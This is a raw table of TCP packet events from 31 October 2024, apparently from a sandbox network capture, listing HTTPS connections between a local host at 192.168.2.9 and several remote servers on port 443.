                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:06.999041080 CET49870443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:06.999052048 CET4434987013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:06.999221087 CET49866443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:06.999267101 CET4434986613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:06.999306917 CET49866443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:06.999335051 CET4434986613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.002630949 CET49868443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.002660990 CET4434986813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.002680063 CET49868443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.002686977 CET4434986813.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.014637947 CET49867443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.014681101 CET4434986713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.035543919 CET49869443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.035589933 CET4434986913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.035609007 CET49869443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.035619020 CET4434986913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.103348017 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.103368044 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.103403091 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.103434086 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.103461027 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.103477955 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.103705883 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.173757076 CET49879443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.173808098 CET4434987913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.173871040 CET49879443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.188431978 CET49879443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.188467026 CET4434987913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.199306965 CET49880443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.199363947 CET4434988013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.199527025 CET49880443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.200073004 CET49880443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.200087070 CET4434988013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.200103045 CET49881443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.200164080 CET4434988113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.200357914 CET49881443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.200558901 CET49881443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.200568914 CET4434988113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.205629110 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.205647945 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.205764055 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.205797911 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.205840111 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.216597080 CET49882443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.216645956 CET4434988213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.216784954 CET49882443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.238790989 CET49883443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.238842964 CET4434988313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.238915920 CET49883443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.249521017 CET49882443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.249562979 CET4434988213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.273384094 CET49883443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.273401976 CET4434988313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.325351954 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.325376034 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.325423956 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.325442076 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.325463057 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.325479984 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.384392023 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.384414911 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.384462118 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.384497881 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.384521961 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.384537935 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.460715055 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.460740089 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.460803986 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.460839987 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.460858107 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.461232901 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.473150969 CET44349877206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.473701000 CET49877443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.473737001 CET44349877206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.474145889 CET44349877206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.474571943 CET49877443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.474653006 CET44349877206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.474976063 CET49877443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.474999905 CET44349877206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.475008965 CET49877443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.475066900 CET49877443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.475071907 CET44349877206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.475095987 CET44349877206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.475156069 CET49877443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.475167990 CET44349877206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.578880072 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.578919888 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.578999043 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.579030991 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.579078913 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.683185101 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.683213949 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.683278084 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.683310032 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.683362007 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.741585970 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.741611958 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.741666079 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.741700888 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.741727114 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.741799116 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.793818951 CET44349877206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.793972015 CET49877443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.793988943 CET44349877206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.794769049 CET49877443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.794812918 CET44349877206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.794879913 CET49877443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.817908049 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.817977905 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.818037987 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.818070889 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.818089962 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.818576097 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.863195896 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.863281012 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.864785910 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.864876032 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.916884899 CET4434987913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.933276892 CET4434988113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.944770098 CET4434988013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.960469961 CET49879443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.960504055 CET4434987913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.961384058 CET49879443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.961393118 CET4434987913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.979446888 CET4434988213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.979991913 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.980010986 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.980067968 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.980099916 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.980144024 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.982311964 CET49882443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.982341051 CET4434988213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.982897997 CET49882443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:07.982906103 CET4434988213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.005393982 CET4434988313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.012279987 CET49881443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.012303114 CET4434988113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.012891054 CET49881443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.012901068 CET4434988113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.014028072 CET49880443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.014060020 CET4434988013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.014437914 CET49880443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.014445066 CET4434988013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.034209013 CET49883443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.034238100 CET4434988313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.038347960 CET49883443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.038360119 CET4434988313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.055183887 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.055206060 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.055253983 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.055277109 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.055301905 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.055321932 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.089458942 CET4434987913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.090351105 CET4434987913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.090399981 CET49879443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.096663952 CET49884443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.096695900 CET4434988452.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.096796989 CET49884443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.099081993 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.099102020 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.099145889 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.099160910 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.099183083 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.099199057 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.107824087 CET49884443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.107841969 CET4434988452.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.108943939 CET4434988213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.109144926 CET4434988213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.109195948 CET49882443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.110014915 CET49885443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.110059977 CET4434988552.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.110210896 CET49885443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.110599995 CET49885443192.168.2.952.9.108.223
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.110610962 CET4434988552.9.108.223192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.116100073 CET49879443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.116122961 CET4434987913.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.119391918 CET49882443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.119419098 CET4434988213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.119434118 CET49882443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.119441032 CET4434988213.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.138586044 CET49886443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.138622046 CET4434988613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.138688087 CET49886443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.139902115 CET49887443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.139954090 CET4434988713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.139965057 CET49886443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.139978886 CET4434988613.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.140037060 CET49887443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.140109062 CET49887443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.140116930 CET4434988713.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.295701981 CET49889443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.295762062 CET44349889206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.295819044 CET49889443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.296025038 CET49889443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.296045065 CET44349889206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.297378063 CET49890443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.297396898 CET44349890206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.297542095 CET49890443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.297735929 CET49890443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.297748089 CET44349890206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.308757067 CET49891443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.308813095 CET44349891206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.309232950 CET49891443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.309447050 CET49891443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.309464931 CET44349891206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.380513906 CET4434988113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.380598068 CET4434988113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.380650043 CET4434988013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.380686045 CET49881443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.380719900 CET4434988013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.380759954 CET49880443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.381102085 CET49881443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.381102085 CET49881443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.381125927 CET4434988113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.381139994 CET4434988113.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.381232977 CET4434988313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.381293058 CET4434988313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.381362915 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.381391048 CET49883443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.381408930 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.381432056 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.381444931 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.381494045 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.381526947 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.381568909 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.383052111 CET49880443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.383076906 CET4434988013.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.383395910 CET49883443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.383395910 CET49883443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.383411884 CET4434988313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.383424997 CET4434988313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.386440039 CET49865443192.168.2.9206.47.98.207
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.386450052 CET44349865206.47.98.207192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.388094902 CET49892443192.168.2.9142.250.185.164
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.388128996 CET44349892142.250.185.164192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.388195992 CET49892443192.168.2.9142.250.185.164
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.388397932 CET49892443192.168.2.9142.250.185.164
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.388406992 CET44349892142.250.185.164192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.395760059 CET49893443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.395780087 CET4434989313.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.395936012 CET49893443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.399385929 CET49894443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.399418116 CET4434989413.107.246.45192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.399476051 CET49894443192.168.2.913.107.246.45
                                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 14:12:08.400635004 CET49895443192.168.2.913.107.246.45
